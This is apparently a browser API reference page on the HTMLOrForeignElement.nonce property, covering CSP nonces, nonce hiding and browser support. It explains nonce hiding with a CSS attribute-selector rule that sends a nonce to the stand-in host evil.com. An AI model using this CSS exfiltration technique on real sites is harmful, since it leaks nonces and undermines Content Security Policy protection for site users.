HTMLOrForeignElement.nonce

The nonce property of the HTMLOrForeignElement interface returns the cryptographic number used once that is used by Content Security Policy to determine whether a given fetch will be allowed to proceed.

In later implementations, elements only expose their nonce attribute to scripts (and not to side-channels like CSS attribute selectors).

Examples

Retrieving a nonce value

In the past, not all browsers supported the nonce IDL attribute, so a workaround is to try to use getAttribute as a fallback:

let nonce = script['nonce'] || script.getAttribute('nonce');

However, recent browsers version hide nonce values that are accessed this way (an empty string will be returned). The IDL property (script['nonce']) will be the only way to access nonces.

Nonce hiding helps preventing that attackers exfiltrate nonce data via mechanisms that can grab data from content attributes like this:

script[nonce~=whatever] {
  background: url("https://evil.com/nonce?whatever");
}

Specifications

Specification
HTML Living Standard
The definition of 'nonce' in that specification.

Browser Compatibility

Update compatibility data on GitHub
DesktopMobile
ChromeEdgeFirefoxInternet ExplorerOperaSafariAndroid webviewChrome for AndroidFirefox for AndroidOpera for AndroidSafari on iOSSamsung Internet
nonceChrome Full support 61Edge Full support 79Firefox Full support 75IE No support NoOpera Full support YesSafari ? WebView Android Full support 61Chrome Android Full support 61Firefox Android No support NoOpera Android Full support YesSafari iOS ? Samsung Internet Android Full support 8.0

Legend

Full support  
Full support
No support  
No support
Compatibility unknown  
Compatibility unknown

See also